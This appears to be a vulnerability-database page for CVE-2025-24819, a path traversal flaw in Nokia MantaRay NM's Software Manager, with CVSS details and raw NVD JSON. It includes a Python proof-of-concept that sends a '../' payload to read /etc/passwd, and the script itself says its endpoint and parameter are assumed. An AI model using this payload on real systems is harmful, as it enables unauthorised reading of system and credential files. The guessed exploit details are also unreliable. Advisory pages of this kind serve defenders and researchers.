Security Vulnerability Report
中文
CVE-2025-24819 CVSS 5.7 MEDIUM

CVE-2025-24819

Published: 2026-04-07 16:16:23
Last Modified: 2026-04-22 18:54:31
Source: b48c3b8f-639e-4c16-8725-497bc411dad0

Description

Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerability due to improper validation of input parameter on the file system in Software Manager application.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:* - VULNERABLE
Nokia MantaRay NM (具体受影响版本请参考Nokia官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL structure example (adjust based on actual environment) target_url = "http://<target-ip>/software-manager/api/file" # The vulnerable parameter is assumed to be 'filename' or 'path' # Payload using relative path traversal to read /etc/passwd payload = { "filename": "../../../../../../../../etc/passwd" } # Attacker needs low-privilege credentials (cookies or auth headers) headers = { "Cookie": "session_id=low_priv_user_session_token" } try: print(f"[*] Sending payload to {target_url}...") response = requests.get(target_url, params=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential exploit successful!") print("[+] Response content:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-24819", "sourceIdentifier": "b48c3b8f-639e-4c16-8725-497bc411dad0", "published": "2026-04-07T16:16:22.917", "lastModified": "2026-04-22T18:54:31.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerability due to improper validation of input parameter on the file system in Software Manager application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:*", "versionEndExcluding": "25r1-nm", "matchCriteriaId": "C678CD07-A42D-4168-8852-9C232E8DA11B"}]}]}], "references": [{"url": "https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24819/", "source": "b48c3b8f-639e-4c16-8725-497bc411dad0", "tags": ["Vendor Advisory"]}]}}